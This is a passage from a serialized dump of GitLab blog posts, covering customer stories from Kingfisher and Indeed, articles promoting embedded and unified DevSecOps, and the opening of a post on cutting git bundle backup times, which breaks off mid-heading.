increasing the use of automation.\n\n> \u003Cimg align=\"left\" width=\"200\" height=\"200\" hspace=\"5\" vspace=\"5\" alt=\"Chintan Parmar\" src=\"https://res.cloudinary.com/about-gitlab-com/image/upload/v1752176076/Blog/ro7u8p695zw9fllbk4j5.png\" style=\"float: left; margin-right: 25px;\"> “The whole point of this is to reduce friction for our engineers, taking away a lot of the complexity in their workflow, and bringing in best practices and governance,” says Chintan Parmar, site reliability engineering manager at Kingfisher. “In terms of what we've done and what we're doing at the moment, it really is about building a foundation in terms of CI/CD and changing the way we deploy to bring in consistency and improve the developer experience.”\n\nParmar talked about his team and their efforts during the [GitLab DevSecOps World Tour event](https://about.gitlab.com/events/devsecops-world-tour/) in London last month. In an on-stage interview with Sherrod Patching, vice president of Customer Success Management at GitLab, he laid out Kingfisher’s journey with the platform, which is enabling its teams, while also making it easier and faster to move software updates and new projects from ideation to deployment.\n\n[Kingfisher](https://www.kingfisher.com/en/index.html) is a parent company with more than 2,000 stores in eight countries across Europe. Listed on the London Stock Exchange and part of the Financial Times Stock Exchange (FTSE) 100 Index, the group reported £13 billion in total revenue in FY 2023/24. Its brands include B&Q, Screwfix, Castorama, and Brico Depot. \n\nThe company first adopted GitLab in 2016, using a free starter license, and then moved to Premium in 2020. In that time, it also has moved from on-premise to a cloud environment, started using shared GitLab runners and source code management, and began building out a CI/CD library that gives team members easy access to standardized and reusable components for typical pipeline stages, such as build, deploy, and test.\n\n## Tracking metrics that execs care about\n\nKingfisher also is tracking metrics, like deployment frequency, lead time to change, and change failure rates, with GitLab. And teams are analyzing value streams, mapping workflows, and finding bottlenecks. All of those metrics are being translated into data that company leaders can sink their teeth into. \n\n“Execs may not care about whether a merge request has been waiting 15 or 20 minutes, but they do care about how we translate that time value into dollars or pounds,” says Parmar, who used GitLab when he previously worked at [Dunelm Group, plc,](https://about.gitlab.com/customers/dunelm/) another major UK-based retailer. “Kingfisher is a very data-driven organization. We are looking to overlay these metrics to see where we can continue to improve our developer experience, eliminating slowdowns and manual tasks, while increasing automation.”\n\nWhile on-stage, Parmar made it clear that all the changes being made are aimed at improving software development and deployment. However, it’s equally paramount to making team members’ jobs easier, giving them more time and autonomy to do the kind of work they enjoy, instead of what can seem like a never-ending stream of repetitive, manual tasks. He noted that the team is so focused on easing workflows and giving engineers more time to be innovative, it has created a “developer experience squad.”\n\n## Putting people first while laying out priorities\n\nSo what’s coming next for Kingfisher and its engineering squads, which have about 600 practitioners?  \n\nAccording to Parmar, Kingfisher already has its priorities mapped out. Using GitLab to [move security left](https://about.gitlab.com/solutions/security-compliance/) is at the top of their list. The group also is focused on continuing to reduce its toolchain, and using automation to increase productivity. And he expects that early in 2025, teams will begin “dabbling” with the artificial intelligence capabilities in [GitLab Duo](https://about.gitlab.com/gitlab-duo/), a suite of AI-powered features in the platform that help increase velocity and solve key pain points across the software development lifecycle. Kingfisher will focus on how that can further increase its efficiency and productivity. \n\nTo get all of this done, Parmar says the first step is to ensure that people come first.\n\n“We’re focused on the hearts and minds of our people... and remembering that people can be attached to how they work through pipelines,” he adds. “People have different ways of building their pipelines. We need to understand what they need, what their workflows look like, and then work with them to find the right solution. After, we’ll go back to them with data that shows the improvements worked. So instead of telling them what they need, we find out what that is, and fix what’s slowing them down. That builds a very good rapport with our engineers.”\n\nChanging how a team creates and deploys software is a journey. Parmar suggests that collaboratively taking developers and security teams on that journey, instead of dragging them along, makes a big difference in ease of migration and in easing team members’ user experience.\n\n> Learn [how other GitLab customers use the DevSecOps platform](https://about.gitlab.com/customers/) to gain results for customers.\n",[901,475,709,799],{"slug":914,"featured":91,"template":789},"kingfisher-transforming-the-developer-experience-with-gitlab",{"content":916,"config":926},{"title":917,"description":918,"authors":919,"heroImage":921,"date":922,"body":923,"category":702,"tags":924},"How Indeed transformed its CI platform with GitLab","The world's #1 job site migrated thousands of projects to GitLab CI, boosting productivity and cutting costs. Learn the benefits they realized, including a 79% increase in daily pipelines.",[920],"Carl Myers","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099351/Blog/Hero%20Images/Blog/Hero%20Images/Indeed-blog-cover-image-2_4AgA1DkWLtHwBlFGvMffbC_1750099350771.png","2024-08-27","***Editor's note: From time to time, we invite members of our customer community to contribute to the GitLab Blog. Thanks to Carl Myers, Manager of CI Platforms at Indeed, for sharing your experience with GitLab.***\n\nHere at Indeed, our mission is to help people get jobs. Indeed is the [#1 job site](https://www.indeed.com/about?isid=press_us&ikw=press_us_press%2Freleases%2Faward-winning-actress-viola-davis-to-keynote-indeed-futureworks-2023_textlink_https%3A%2F%2Fwww.indeed.com%2Fabout) in the world with more than 350 million unique visitors every month.\n\nFor Indeed's Engineering Platform teams, we have a slightly different motto: \"We help people to help people get jobs.\" As part of a data-driven engineering culture that has spent the better part of two decades always putting the job seeker first, we are responsible for building the tools that not only make this possible, but empower engineers to deliver positive outcomes to job seekers every day.\n\nGitLab Continuous Integration has allowed Indeed’s CI Platform team of just 11 people to effectively support thousands of users across the company. Other benefits Indeed has realized by moving to GitLab CI include:\n- 79% increase in daily pipelines\n- 10-20% lower CI hardware costs\n- Decreased support burden\n\n## Evolving our CI platform: From Jenkins to a scalable solution\n\nLike many large technology companies, we built our CI platform organically as the company scaled, using the de facto open source and industry standard solutions available at the time. Back in 2007, when Indeed had fewer than 20 engineers, we were using Hudson, Jenkins’ direct predecessor.\n\nToday, through nearly two decades of growth, we have thousands of engineers. As new technology became available, we made incremental improvements, switching to Jenkins around 2011. Another improvement allowed us to move most of our workloads to dynamic cloud worker nodes using [AWS EC2](https://aws.amazon.com/ec2/). As we entered the Kubernetes age, however, the system architecture reached its limits.\n\nJenkins’ architecture was not created with the cloud in mind. Jenkins operates by having a \"controller\" node, a single point of failure that runs critical parts of a pipeline and farms out certain steps to worker nodes (which can scale horizontally to some extent). Controllers are also a manual scaling axis.\n\nIf you have too many jobs to fit on one controller, you must partition your jobs across controllers manually. CloudBees offers ways to mitigate this, including the CloudBees Jenkins Operations Center, which allows you to manage your constellation of controllers from a single centralized place. However, controllers remain challenging to run in a Kubernetes environment because each controller is a fragile single point of failure. Activities like node rollouts or hardware failures cause downtime.\n\nIn addition to the technical limitations baked into Jenkins itself, our CI platform also had several problems of our own making. For example, we used the Groovy Jenkins DSL to generate jobs from code in each repository. This led to each project having its own copy-pasted job pipeline, resulting in hundreds of versions that were hard to maintain and update. While Indeed’s engineering culture values flexibility and allows teams to operate in separate repositories, this flexibility became a burden as teams spent too much time addressing regular maintenance requests.\n\nRecognizing our technical debt, we turned to the [Golden Path pattern](https://tag-app-delivery.cncf.io/whitepapers/platforms/), which allows flexibility while providing a default route to simplify updates and encourage consistent practices across projects.\n\nThe CI Platform team at Indeed is not very large. Our team of around 11 engineers supports thousands of users, fielding support requests, performing upgrades and maintenance, and enabling always-on support for our global company.\n\nBecause our team not only supports our GitLab instance but also the entire CI platform, including the artifact server, our shared build code, and multiple other custom components of our platform, we had our work cut out for us. We needed a plan that would help us address our challenges while making the most efficient use of our existing resources.\n\n## Moving to GitLab CI\n\nAfter a careful design review with key stakeholders, we decided to migrate the entire company from Jenkins to GitLab CI. The primary reasons for choosing GitLab CI were:\n- We were already using GitLab for source code management.\n- GitLab is a complete offering that provides everything we need for CI.\n- GitLab CI is designed for scalability and the cloud.\n- GitLab CI enables us to write templates that extend other templates, which is compatible with our golden path strategy.\n- GitLab is open source software and the GitLab team has always been supportive in helping us submit fixes, giving us extra flexibility and reassurance.\n\nBy the time we officially announced that the GitLab CI Platform would be generally available to users, we already had 23% of all builds happening in GitLab CI from a combination of grassroots efforts and early adopters.\n\nThe challenge of the migration, however, would be the long tail. Due to the number of custom builds in Jenkins, an automated migration tool would not work for the majority of teams. Most of the benefits of the new system would not come until the old system was at 0%. Only then could we turn off the hardware and save the CloudBees license fee.\n\n## Feature parity and the benefits of starting over\n\nThough we support many different technologies at Indeed, the three most common languages are Java, Python, and JavaScript. These language stacks are used to make libraries, deployables (web services or applications), and cron jobs (a process that runs at regular intervals, for example, to build a data set in our data lake). Each of these formed a matrix of project types (Java Library, Python Cronjob, JavaScript Webapp, etc.) for which we had a skeleton in Jenkins. Therefore, we had to produce a golden path template in GitLab CI for each of these project types.\n\nMost users could use these recommended paths without change, but for those who did require customization, the golden path would still be a valuable starting point and enable them to change only what they needed, while still benefiting from centralized template updates in the future.\n\nWe quickly realized that most users, even those with customizations, were happy to take the golden path and at least try it. If they missed their customizations, they could always add them later. This was a surprising result! We thought that teams who had invested in significant customization would be loath to give them up, but in the majority of cases teams just didn't care about them anymore. This allowed us to migrate many projects very quickly — we could just drop the golden path (a small file about 6 lines long with includes) into their project, and they could take it from there.\n\n## InnerSource to the rescue\n\nThe CI Platform team also adopted a policy of \"external contributions first\" to encourage everyone in the company to participate. This is sometimes called InnerSource. We wrote tests and documentation to enable external contributions — contributions from outside our immediate team — so teams that wanted to write customizations could instead include them in the golden path behind a feature flag. This let them share their work with others and ensure we didn't break them moving forward (because they became part of our codebase, not theirs).\n\nThis also had the benefit that particular teams who were blocked waiting for a feature they needed were empowered to work on the feature themselves. We could say \"we plan to implement the feature in a few weeks, but if you need it earlier than that we are happy to accept a contribution.\" In the end, many core features necessary for parity were developed in this manner, more quickly and better than our team had resources to do it. The migration would not have been a success without this model.\n\n## Ahead of schedule and under budget\n\nOur CloudBees license expired on April 1, 2024. This gave us an aggressive target to achieve the full migration. This was particularly ambitious considering that at the time, 80% of all builds (60% of all projects) still used Jenkins for their CI. This meant over 2,000 [Jenkinsfiles](https://www.jenkins.io/doc/book/pipeline/jenkinsfile/) would still need to be rewritten or replaced with our golden path templates.\n\nTo achieve this target, we made documentation and examples available, implemented features where possible, and helped our users contribute features where they were able.\n\nWe started regular office hours, where anyone could come and ask questions or seek our help to migrate. We additionally prioritized support questions relating to migration ahead of almost everything else. Our team became GitLab CI experts and shared that expertise inside our team and across the organization.\n\nAutomatic migration for most projects was not possible, but we discovered it could work for a small subset of projects where customization was rare. We created a Sourcegraph batch change campaign to submit merge requests to migrate hundreds of projects, and poked and prodded our users to accept these MRs.\n\nWe took success stories from our users and shared them widely. As users contributed new features to our golden paths, we advertised that these features \"came free\" when you migrated to GitLab CI. Some examples included built-in security and compliance scanning, Slack notifications for CI builds, and integrations with other internal systems.\n\nWe also conducted a campaign of aggressive \"scream tests.\" We automatically disabled Jenkins jobs that hadn't run or succeeded in a while, and told users that if they needed them, they could turn them back on. This was a low-friction way to identify which jobs were actually needed. We had thousands of jobs that hadn't been run a single time since our last CI migration (which was Jenkins to Jenkins). This told us we could safely ignore almost all of them.\n\nIn January 2024, we nudged our users by announcing that all Jenkins controllers would become read-only (no builds) unless an exception was explicitly requested. We had much better ownership information for controllers and they generally aligned with our organization's structure, so it made sense to focus on controllers rather than jobs. The list of controllers was also a much more manageable list than the list of jobs.\n\nTo obtain an exception, we asked our users to find their controllers in a spreadsheet and put their contact information next to each one. This enabled us to get a guaranteed up-to-date list of stakeholders we could follow up with as we sprinted to the finish line, but also enabled users to clearly let us know which jobs they absolutely needed. At peak, we had about 400 controllers; by January we had 220, but only 54 controllers required exceptions (several of them owned by us, to run our tests and canaries).\n\n![Indeed - Jenkins Controller Count graph](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099357/Blog/Content%20Images/Blog/Content%20Images/image2_aHR0cHM6_1750099357392.png)\n\nWe had a manageable list of around 50 teams we divided among our team and started doing outreach to understand how each team was progressing with the migration. We spent January and February discovering that some teams planned to finish their migration without our help before February 28 others were planning to deprecate their projects before then, and a very small number were very worried they wouldn't make it.\n\nWe were able to work with this smaller set of teams and provide them with “white-glove” service. We still explained that while we lacked the expertise necessary to do the migration for them, we could partner with a subject matter expert from their team. For some projects, we wrote and they reviewed; for others, they wrote and we reviewed. In the end, all of our work paid off and we turned off Jenkins on the very day we had announced 8 months earlier.\n\n## The results: Enhanced CI efficiency and user satisfaction\n\nAt its peak, our Jenkins CI platform ran over 14,000 pipelines per day and serviced our thousands of projects. Today, our GitLab CI platform has run over 40,000 pipelines in a single day and regularly runs over 25,000 per day. The incremental cost of each job of each pipeline is similar to Jenkins, but without the overhead of hardware to run the controllers. Additionally, these controllers served as single points of failure and scaling limiters that forced us to artificially divide our platform into segments. While an apples-to-apples comparison is difficult, we find that with this overhead gone our CI hardware costs are 10-20% lower. Additionally, the support burden of GitLab CI is lower since the application automatically scales in the cloud, has cross-availability-zone resiliency, and the templating language has excellent public documentation available.\n\nA benefit just as important, if not moreso, is that now we are at over 70% adoption of our golden paths. This means that we can roll out an improvement and over 5,000 projects at Indeed will benefit immediately with no action required on their part. This has enabled us to move some jobs to more cost-effective ARM64 instances, keep users' build images updated more easily, and better manage other cost saving opportunities. Most importantly, our users are happier with the new platform.\n\n__About the author:__\n*Carl Myers lives in Sacramento, CA, and is the manager of the CI Platform team at Indeed. Carl has spent his nearly two-decade career dedicated to building internal tools and developer platforms that delight and empower engineers at companies large and small.*\n\n**Acknowledgements:**\n*This migration would not have been possible without the tireless efforts of Tron Nedelea, Eddie Huang, Vivek Nynaru, Carlos Gonzalez, Lane Van Elderen, and the rest of the CI Platform team. The team also especially appreciates the leadership of Deepak Bitragunta, and Irina Tyree for helping secure buy-in, resources and company wide alignment throughout this long project. Finally, our thanks go out to everyone across Indeed who contributed code, feedback, bug reports, and helped migrate projects.*\n\n**This is an edited version of the article [How Indeed Replaced Its CI Platform with Gitlab CI](https://engineering.indeedblog.com/blog/2024/08/indeed-gitlab-ci-migration/), originally published on the Indeed engineering blog.**",[901,109,925,475],"user stories",{"slug":927,"featured":91,"template":789},"how-indeed-transformed-its-ci-platform-with-gitlab",{"category":709,"slug":713,"posts":929},[930,944,956],{"content":931,"config":942},{"title":932,"description":933,"authors":934,"heroImage":936,"date":937,"body":938,"category":713,"tags":939},"Why now is the time for embedded DevSecOps","Learn how embedded development teams address long feedback cycles, manual compliance, and isolated development with DevSecOps.",[935],"Matt DeLaney","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659978/Blog/Hero%20Images/automation.png","2025-07-01","For embedded systems teams, DevSecOps has traditionally seemed like an approach better suited to SaaS applications than firmware development. But this is changing. Software is now a primary differentiator in hardware products. New market expectations demand modern development practices. In response, organizations are pursuing \"embedded DevSecOps.\"\n\nWhat is embedded DevSecOps? The application of collaborative engineering practices, integrated toolchains, and automation for building, testing, and securing software to embedded systems development. Embedded DevSecOps includes necessary adaptations for hardware integration.\n## Convergence of market forces\nThree powerful market forces are converging to compel embedded teams to modernize their development practices.\n### 1. The software-defined product revolution\nProducts once defined primarily by their hardware are now differentiated by their software capabilities. The software-defined vehicle (SDV) market tells a compelling story in this regard. It's projected to grow from $213.5 billion in 2024 to [$1.24 trillion](https://www.marketsandmarkets.com/Market-Reports/software-defined-vehicles-market-187205966.html) by 2030, a massive 34% compound annual growth rate.\nThe software content in these products is growing considerably. By the end of 2025, the average vehicle is expected to contain [650 million lines of code](https://www.statista.com/statistics/1370978/automotive-software-average-lines-of-codes-per-vehicle-globally/). Traditional embedded development approaches cannot handle this level of software complexity. \n### 2. Hardware virtualization as a technical enabler\nHardware virtualization is a key technical enabler of embedded DevSecOps. Virtual electronic control units (vECUs), cloud-based ARM CPUs, and sophisticated simulation environments are becoming more prevalent. Virtual hardware allows testing that once required physical hardware.\n\nThese virtualization technologies provide a foundation for continuous integration ([CI](https://about.gitlab.com/topics/ci-cd/)). But their value is fully realized only when integrated into an automated workflow. Combined with collaborative development practices and automated pipelines, virtual testing helps teams detect issues much earlier, when fixes are far less expensive. Without embedded DevSecOps practices and tooling to orchestrate these virtual resources, organizations can't capitalize on the virtualization trend.\n### 3. The competitive and economic reality\nThree interrelated forces are reshaping the competitive landscape for embedded development:\n- The talent war has shifted decisively. As an embedded systems leader at a GitLab customer explained, “No embedded engineers graduating from college today know legacy tools like Perforce. They know Git. These young engineers will work at a company for six months on legacy tools, then quit.” Companies using outdated tools may lose their engineering future.\n- This talent advantage translates into competitive superiority. Tech-forward companies that attract top engineers with modern practices achieve remarkable results. For example, in 2024, [SpaceX](https://spacenews.com/spacex-launch-surge-helps-set-new-global-launch-record-in-2024/) performed more orbital launches than the rest of the world combined. Tech-forward companies excel at software development and embrace a modern development culture. This, among other things, creates efficiencies that legacy companies struggle to match. \n- The rising costs of embedded development — driven by long feedback cycles — create an urgent need for embedded DevSecOps. When developers have to wait weeks to test code on hardware test benches, productivity remains inherently low. Engineers lose context and must switch contexts when results arrive. The problem worsens when defects enter the picture. Bugs become more expensive to fix the later they're discovered. Long feedback cycles magnify this problem in embedded systems.\n\nOrganizations are adopting embedded DevSecOps to help combat these challenges.\n## Priority transformation areas\nBased on these market forces, forward-thinking embedded systems leaders are implementing embedded DevSecOps in the following ways. \n### From hardware bottlenecks to continuous testing\nHardware-testing bottlenecks represent one of the most significant constraints in traditional embedded development. These delays create the unfavorable economics described earlier — when developers wait weeks for hardware access, defect costs spiral.\nAddressing this challenge requires a multifaceted approach including: \n* Automating the orchestration of expensive shared hardware test benches among embedded developers  \n* Integrating both SIL (Software-in-the-Loop) and HIL (Hardware-in-the-Loop) testing into automated CI pipelines  \n* Standardizing builds with version-controlled environments\n\nEmbedded developers can accomplish this with GitLab's [On-Premises Device Cloud](https://gitlab.com/gitlab-accelerates-embedded/comp/device-cloud), a CI/CD component. Through automating the orchestration of firmware tests on virtual and real hardware, teams are better positioned to reduce feedback cycles from weeks to hours. They also can catch more bugs early on in the software development lifecycle.\n### Automating compliance and security governance\nEmbedded systems face strict regulatory requirements. Manual compliance processes are unsustainable.\nLeading organizations are transforming how they comply with these requirements by: \n* Replacing manual workflows with automated [compliance frameworks](https://about.gitlab.com/blog/introducing-custom-compliance-frameworks-in-gitlab/)  \n* Integrating specialized functional safety, security, and code quality tools into automated continuous integration pipelines  \n* Automating approval workflows, enforcing code reviews, and maintaining audit trails  \n* Configuring compliance frameworks for specific standards like ISO 26262 or DO-178C\n\nThis approach enables greater compliance maturity without additional headcount — turning what was once a burden into a competitive advantage. One leading electric vehicle (EV) manufacturer executes 120,000 CI/CD jobs per day with GitLab, many of which include compliance checks. And they can fix and deploy bug fixes to vehicles within an hour of discovery. This level of scale and speed would be extremely difficult without automated compliance workflows.\n### Enabling collaborative innovation\nHistorically, for valid business and technical reasons, embedded developers have largely worked alone at their desks. Collaboration has been limited. Innovative organizations break down these barriers by enabling shared code visibility through integrated source control and CI/CD workflows. These modern practices attract and retain engineers while unlocking innovation that would remain hidden in isolated workflows.\nAs one director of DevOps at a tech-forward automotive manufacturer (a GitLab customer) explains: \"It's really critical for us to have a single pane of glass that we can look at and see the statuses. The developers, when they bring a merge request, are aware of the status of a given workflow in order to move as fast as possible.\" This transparency accelerates innovation, enabling automakers to rapidly iterate on software features that differentiate their vehicles in an increasingly competitive market.\n## The window of opportunity\nEmbedded systems leaders have a clear window of opportunity to gain a competitive advantage through DevSecOps adoption. But the window won't stay open forever. Software continues to become the primary differentiator in embedded products, and the gap between leaders and laggards will only widen.\nOrganizations that successfully adopt DevSecOps will reduce costs, accelerate time-to-market, and unlock innovation that differentiates them in the market. The embedded systems leaders of tomorrow are the ones embracing DevSecOps today.\n> While this article explored why now is the critical time for embedded teams to adopt DevSecOps, you may be wondering about the practical steps to get started. Learn how to put these concepts into action with our guide: [4 ways to accelerate embedded development with GitLab](https://about.gitlab.com/blog/4-ways-to-accelerate-embedded-development-with-gitlab/).",[940,757,109,941],"embedded DevOps","automotive",{"featured":6,"template":789,"slug":943},"why-now-is-the-time-for-embedded-devsecops",{"content":945,"config":954},{"title":946,"description":947,"authors":948,"heroImage":950,"date":951,"body":952,"category":713,"tags":953},"Why are organizations moving to a unified DevSecOps platform?","Learn about GitLab's comprehensive, unified DevSecOps platform, which integrates tools, enhances security, and leverages AI for efficient software development.",[949],"Itzik Gan Baruch","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097063/Blog/Hero%20Images/Blog/Hero%20Images/securitylifecycle-light_securitylifecycle-light.png_1750097063583.png","2025-06-02","In today’s modern software development landscape, many organizations are migrating to the cloud and adopting DevSecOps processes. However, this transition presents a significant challenge: a proliferation of tools and legacy systems not designed for modern development. To adapt these systems to DevSecOps, organizations must create integrations between multiple tools for task management, CI/CD, security, monitoring, and more. The result? Operational complexity, high maintenance costs, and disrupted collaboration between development and operations teams. Additionally, developers experience frustration as they constantly switch between different tools to complete a single development flow – from planning to production.\n\n![The complexity and operational costs of integrating multiple tools into a DevSecOps process](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097077/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097077287.jpg)\n\n\u003Ccenter>\u003Ci>How complex it can be to integrate multiple tools into a DevSecOps process\u003C/i>\u003C/center>\n\n\u003Cbr>\u003C/br>\n\nThe good news is that a solution exists: A comprehensive DevSecOps platform offering a unified approach to software development.\n\nThese platforms are built for organizations operating in cloud-based and DevSecOps environments, consolidating all software development stages — from code management, CI/CD processes, task management, and security to AI-driven automation — into a single platform. Centralizing all software development workflows in a unified interface enables development and operations teams to work more efficiently, streamline communication, and minimize operational complexities and disruptions.\n\nFurthermore, the developer experience significantly improves — engineers are much happier working with a product designed specifically for modern development needs.\n\nIn the sections below, we’ll explore how GitLab helps teams overcome common challenges — whether it’s managing projects and tasks, ensuring security and compliance, or adopting AI-powered development tools – all within a single, unified platform.\n\n## Integrated Agile project management\n\nGitLab provides a holistic solution in which project and task management are fully integrated across all stages of the software development lifecycle, such as CI/CD, enabling real-time tracking of development progress. Issues and epics directly link to automation processes, allowing a seamless flow from planning to production deployment. This approach enhances transparency across teams, reduces delays, and ensures that all stakeholders have a clear view of the development status in real-time.\n\n![Issues and epics directly link to automation processes, allowing a seamless flow from planning to production deployment.](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097077/Blog/Content%20Images/Blog/Content%20Images/image3_aHR0cHM6_1750097077288.jpg)\n\n## Built-in security\nGitLab strongly emphasizes integrating security capabilities end-to-end (security first). The platform integrates a wide range of automated security scanners, including:\n\n- [Dependency Scanning](https://docs.gitlab.com/user/application_security/dependency_scanning/)\n- [Static Application Security Testing (SAST)](https://docs.gitlab.com/user/application_security/sast/)\n- [Dynamic Application Security Testing (DAST)](https://docs.gitlab.com/user/application_security/dast/)\n- [Secret Detection](https://docs.gitlab.com/user/application_security/secret_detection/)\n- [Container Scanning](https://docs.gitlab.com/user/application_security/container_scanning/)\n\n![Security scanning capabilities integrated into the CI/CD process at various development stages](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097077/Blog/Content%20Images/Blog/Content%20Images/image2_aHR0cHM6_1750097077289.jpg)\n\n\u003Ccenter>\u003Ci>Security scanning capabilities integrated into the CI/CD process at various development stages\u003C/i>\u003C/center>\n\n\u003Cbr>\u003C/br>\n\nThese security checks are built directly into every phase of the software development lifecycle, including the CI/CD pipeline, to provide developers with immediate feedback on potential security issues early in the development cycle.\n\n## Compliance and regulatory requirements\n\nBeyond efficiency and user experience, many organizations — especially those in regulated industries such as financial institutions or large enterprises — must ensure their processes comply with strict security and compliance standards. They need the ability to enforce policies for different projects, such as mandating a security scanner every time a CI/CD pipeline runs on specific code branches (e.g., main or protected branches) or requiring specific approvals before merging code into the main branch.\n\nWith GitLab, this becomes easier through [Compliance Frameworks](https://about.gitlab.com/blog/introducing-custom-compliance-frameworks-in-gitlab/), a feature that allows organizations to define and enforce structured policies for selected projects. This ensures compliance with automatic regulatory and security requirements while maintaining a seamless and efficient developer workflow.\n\n## AI-powered development\n\n[GitLab Duo](https://about.gitlab.com/gitlab-duo/) provides AI-driven assistance across all development stages, eliminating the need to switch to external tools. Every AI-powered request is processed within the full context of the project and codebase, enabling smarter and more efficient work.\n\nAI can perform example tasks such as:\n- automatic task description generation\n- smart summarization of issue discussions, saving developers valuable time\n- advanced code review capabilities\n- code improvement and optimization suggestions\n- automated test generation\n- security vulnerability detection and remediation\n- troubleshooting root cause analysis for CI pipeline failures\n- privacy and Data Security\n\nUnderstanding the needs of regulated organizations, particularly in the public and financial sectors, GitLab offers a unique solution for running AI models in a secure environment. GitLab Duo Self-Hosted enables organizations to maintain full control over data privacy, security, and the deployment of large language models ([LLMs](https://about.gitlab.com/blog/what-is-a-large-language-model-llm/)) in their own infrastructure, ensuring:\n- data privacy protection\n- compliance with regulatory requirements\n- maximum security\n- AI benefits without external network dependencies or risks\n\n## Summary\n\nOrganizations need a comprehensive DevSecOps platform to streamline processes, enhance security, and accelerate innovation. GitLab delivers precisely that — a single application consolidating all essential development, security, and operational tools with built-in security integration and AI-powered automation.\n\nReady to see GitLab in action? Explore interactive demos of:\n\n- [GitLab Premium and Ultimate with Duo](https://gitlab.navattic.com/gitlab-premium-with-duo) – experience AI-powered development assistance\n\n- [Adding security to the CI/CD pipeline](https://gitlab.navattic.com/gitlab-scans) – see how integrated security scanning protects your software\n\n- [Compliance frameworks](https://gitlab.navattic.com/compliance) – discover how GitLab enforces policies across projects for better governance\n\n> Join the GitLab 18 virtual launch event to learn about the future of the DevSecOps platform, including the role of agentic AI. [Register today!](https://about.gitlab.com/eighteen/)",[709,475,757],{"slug":955,"featured":6,"template":789},"why-are-organizations-moving-to-a-unified-devsecops-platform",{"content":957,"config":967},{"title":958,"description":959,"authors":960,"heroImage":962,"date":963,"body":964,"category":713,"tags":965},"Overcome AI sprawl with a Value Stream Management approach","From The Source: Learn how an AI strategy based on Value Stream Management can stop AI sprawl and supply chain constraints and drive ROI.",[961],"Stephen Walters","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749665000/Blog/Hero%20Images/display-the-source-article-overcome-ai-sprawl-image-0492-1800x945-fy25.png","2025-01-06","This is a cross-over post about [overcoming AI sprawl with a Value Stream Management approach](https://about.gitlab.com/the-source/ai/overcome-ai-sprawl-with-a-value-stream-management-approach/).",[709,799,966],"performance",{"slug":968,"featured":6,"template":789,"externalUrl":969},"overcome-ai-sprawl-with-a-value-stream-management-approach","https://about.gitlab.com/the-source/ai/overcome-ai-sprawl-with-a-value-stream-management-approach/",{"category":721,"slug":725,"posts":971},[972,986,996],{"content":973,"config":984},{"title":974,"description":975,"authors":976,"heroImage":979,"date":980,"body":981,"category":725,"tags":982},"How we decreased GitLab repo backup times from 48 hours to 41 minutes","Learn how we tracked a performance bottleneck to a 15-year-old Git function and fixed it, leading to enhanced efficiency that supports more robust backup strategies and can reduce risk.",[977,978],"Karthik Nayak","Manuel Kraft","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097166/Blog/Hero%20Images/Blog/Hero%20Images/REFERENCE%20-%20display%20preview%20for%20blog%20images%20%282%29_2pKf8RsKzAaThmQfqHIaa7_1750097166565.png","2025-06-05","Repository backups are a critical component of any robust disaster recovery strategy. However, as repositories grow in size, the process of creating reliable backups becomes increasingly challenging.  Our own [Rails repository](https://gitlab.com/gitlab-org/gitlab) was taking 48 hours to back up — forcing impossible choices between backup frequency and system performance. We wanted to tackle this issue for our customers and for our own users internally. \n\nUltimately, we traced the issue to a 15-year-old Git function with O(N²) complexity and fixed it with an algorithmic change, __reducing backup times exponentially__. The result: lower costs, reduced risk, and backup strategies that actually scale with your codebase.\n\nThis turned out to be a Git scalability issue that affects anyone with large repositories. Here's how we tracked it down and fixed it. \n\n## Backup at scale\n\nFirst, let's look at the problem. As organizations scale their repositories and backups grow more complex, here are some of the challenges they can face:\n\n* **Time-prohibitive backups:** For very large repositories, creating a repository backup could take several hours, which can hinder the ability to schedule regular backups. \n* **Resource intensity:** Extended backup processes can consume substantial server resources, potentially impacting other operations.\n* **Backup windows:** Finding adequate maintenance windows for such lengthy processes can be difficult for teams running 24/7 operations.\n* **Increased failure risk:** Long-running processes are more susceptible to interruptions from network issues, server restarts, and system errors, which can force teams to restart the entire very long backup process from scratch.\n* **Race conditions:** Because it takes a long time to create a backup, the repository might have changed a lot during the process, potentially creating an invalid backup or interrupting the backup because objects are no longer available.\n\nThese challenges can lead to compromising on backup frequency or completeness – an unacceptable trade-off when it comes to data protection. Extended backup windows can force customers into workarounds. Some might adopt external tooling, while others might reduce backup frequency, resulting in potential inconsistent data protection strategies across organizations.\n\nNow, let's dig into how we identified a performance bottleneck, found a resolution, and deployed it to help cut backup times.\n\n## The technical challenge\n\nGitLab's repository backup functionality relies on the [`git bundle create`](https://git-scm.com/docs/git-bundle) command, which captures a complete snapshot of a repository, including all objects and references like branches and tags. This bundle serves as a restoration point for recreating the repository in its exact state.\n\nHowever, the implementation of the command suffered from poor scalability related to reference count, creating a performance bottleneck. As repositories accumulated more references, processing time increased exponentially. In our largest repositories containing millions of references, backup operations could extend beyond 48 hours.\n\n### Root cause analysis\n\nTo identify the root cause of this performance bottleneck, we analyzed a flame graph of the command during execution.\n\n![Flame graph showing command during execution](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097176/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097176388.jpg)\n\nA flame graph displays the execution path of a command through its stack trace. Each bar corresponds to a function in the code, with the bar's width indicating how much time the command spent executing within that particular function.\n\nWhen examining the flame graph of `git bundle create` running on a repository with 10,000 references, approximately 80% of the execution time is consumed by the `object_array_remove_duplicates()` function. This function was introduced to Git in the [commit b2a6d1c686](https://gitlab.com/gitlab-org/git/-/commit/b2a6d1c686) (bundle: allow the same ref to be given more than once, 2009-01-17).\n\nTo understand this change, it's important to know that `git bundle create` allows users to specify which references to include in the bundle. For complete repository bundles, the `--all` flag packages all references.\n\nThe commit addressed a problem where users providing duplicate references through the command line – such as `git bundle create main.bundle main main` - would create a bundle without properly handling the duplicated main reference. Unbundling this bundle in a Git repository would break, because it tries to write the same ref twice. The code to avoid duplication uses nested `for` loops that iterate through all references to identify duplicates. This O(N²) algorithm becomes a significant performance bottleneck in repositories with large reference counts, consuming substantial processing time.\n\n### The fix: From O(N²) to efficient 